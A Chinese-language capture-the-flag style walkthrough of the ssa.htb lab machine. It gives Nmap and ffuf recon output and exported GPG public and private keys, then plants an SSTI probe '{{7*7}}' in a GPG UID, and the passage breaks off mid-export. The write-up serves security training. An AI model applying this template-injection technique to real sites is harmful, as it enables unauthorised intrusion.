靶场信息
信息收集
Nmap
首先加入一个 hosts 解析
echo 10.10.11.218 ssa.htb >> /etc/hosts
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.10.11.218
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 21:51 CST
Warning: 10.10.11.218 giving up on port because retransmission cap hit (10).
Nmap scan report for ssa.htb (10.10.11.218)
Host is up (0.40s latency).
Not shown: 64083 closed tcp ports (reset), 1449 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after: 2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 465.69 ms 10.10.16.1
2 320.25 ms ssa.htb (10.10.11.218)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.15 seconds
Http
就一个页面,也没什么内容,做个 Fuzz 吧
Fuzz
┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u 'https://ssa.htb/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/'___ /'___ /'___
/ __/ / __/ __ __ / __/
,__\ ,__/ / ,__
_/ _/ _ _/
_ _ ____/ _
/_/ /_/ /___/ /_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : https://ssa.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
admin [Status: 302, Size: 227, Words: 18, Lines: 6, Duration: 1728ms]
contact [Status: 200, Size: 3543, Words: 772, Lines: 69, Duration: 1169ms]
login [Status: 200, Size: 4392, Words: 1374, Lines: 83, Duration: 1169ms]
logout [Status: 302, Size: 229, Words: 18, Lines: 6, Duration: 1174ms]
about [Status: 200, Size: 5584, Words: 1147, Lines: 77, Duration: 2395ms]
view [Status: 302, Size: 225, Words: 18, Lines: 6, Duration: 1556ms]
guide [Status: 200, Size: 9043, Words: 1771, Lines: 155, Duration: 1976ms]
process [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 1424ms]
[Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 2046ms]
pgp [Status: 200, Size: 3187, Words: 9, Lines: 54, Duration: 1074ms]
:: Progress: [30000/30000] :: Job [1/1] :: 66 req/sec :: Duration: [0:17:33] :: Errors: 2 ::
到处看看
登录面板
访问 login 和 admin、view 都会跳转到登录页面
contact
提交 PGP 的页面
guide
允许我们利用 PGP 公钥加密、解密或验证文本
在最底下有一个可用的用户名 atlas
PGP
是网站的 PGP 公钥
漏洞利用
https://linuxhint.com/generate-pgp-keys-gpg/
经过搜索,可以使用上面地址里提到的方法来生成 PGP 公私钥
GPG 创建
┌──(root㉿kali)-[~/Desktop]
└─# gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
注意:使用 “gpg --full-generate-key” 以获得一个全功能的密钥生成对话框。
GnuPG 需要构建用户标识以辨认您的密钥。
真实姓名: Lucifiel
电子邮件地址: [email protected]
您选定了此用户标识:
“Lucifiel <[email protected]>”
更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
gpg: /root/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 目录‘/root/.gnupg/openpgp-revocs.d’已创建
gpg: 吊销证书已被存储为‘/root/.gnupg/openpgp-revocs.d/99DC61F38F13D6BDB2736B258E229F58650BFB3E.rev’
公钥和私钥已经生成并被签名。
pub rsa3072 2023-06-29 [SC] [有效至:2025-06-28]
99DC61F38F13D6BDB2736B258E229F58650BFB3E
uid Lucifiel <[email protected]>
sub rsa3072 2023-06-29 [E] [有效至:2025-06-28]
导出公钥
┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
/gYsDRdC1IzRUH96wcysVYl8sudf2Q==
=xRpf
-----END PGP PUBLIC KEY BLOCK-----
导出私钥
┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key
-----BEGIN PGP PRIVATE KEY BLOCK-----
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
=4ri8
-----END PGP PRIVATE KEY BLOCK-----
制作和验证签名
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
life-time
-----BEGIN PGP SIGNATURE-----
iQGzBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdlaYACgkQjiKfWGUL
+z5I9Qv/fqJwqwWkOVx7erSjHkXOIdBwpDOrNutgRZNpV2ONddBViAaIIW81ctJH
TbktO6A+lgnSdLMgXa15RXKsyfpWyk7tJAAjDvmZzhlAmPyRCK1odS1oqWxjSwxx
YhjVY0SmV4To7VuGv3kccnMCKJpRmo2K7LREfjej7Uy0qgcKKUpb6wSfMu856vl0
VCHeKtYM0RwckgqcGlTB/aT1ThzBVb+MGEiFaiVhUrRsznM+N++AK6oM0HCjqHXV
CcI6Y/BR65z/CAo4adrqFqmRzQJ8I9KqCdjePXqrvs1VIQGas1kvtjCGizX6zWUO
iZC9GgybJSeEA/v1ng8GeFxBRX3K1irt4nNIzv+ke/6Xg3csfwQT+UAOC4nsDkQG
4PsHpvtxBlRLf4pdY0lYma97/OX+PPGEBudh997h+6nDEDKlUMwA71OYUk7w5uEW
EWpIVE31L0PwLRVQR5bEsVkzErSBmaaQZaF7CSaHAxPp4IukrlfyvbyLgaii58d5
AIRSUmnE
=QNzT
-----END PGP SIGNATURE-----
GPG 验证
去 https://ssa.htb/guide 验证一下我们的 GPG 密钥
在回显中,我们在创建 GPG 密钥的时候输入的 name,也就是 Lucifiel 显示在回显中了,我怀疑这里有 SSTI,去重新生成尝试一下
SSTI
https://www.sobyte.net/post/2021-12/modify-gpg-uid-name/
找到了一篇修改 GPG UID 的相关文章
┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key [email protected]
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
私钥可用。
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1). Lucifiel <[email protected]>
gpg> adduid
真实姓名: {{7*7}}
电子邮件地址: [email protected]
注释:
您选定了此用户标识:
“{{7*7}} <[email protected]>”
更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>
生成好了一个新的 UID,现在我们去提升它的信任等级
gpg> trust
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>
请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度
1 = 我不知道或不作答
2 = 我不相信
3 = 我勉强相信
4 = 我完全相信
5 = 我绝对相信
m = 回到主菜单
您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1) Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>
gpg> uid 1
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 绝对 ] (1)* Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>
gpg> deluid
真的要移除此用户标识吗?(y/N) y
sec rsa3072/8E229F58650BFB3E
创建于:2023-06-29 有效至:2025-06-28 可用于:SC
信任度:绝对 有效性:绝对
ssb rsa3072/DA683892A79B6B19
创建于:2023-06-29 有效至:2025-06-28 可用于:E
[ 未知 ] (1). {{7*7}} <[email protected]>
gpg> save
这样就搞定了
导出公钥
┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
BiwNF0LUjNFQf3rBzKxViXyy51/Z
=73Dn
-----END PGP PUBLIC KEY BLOCK-----
导出私钥
┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key
-----BEGIN PGP PRIVATE KEY BLOCK-----
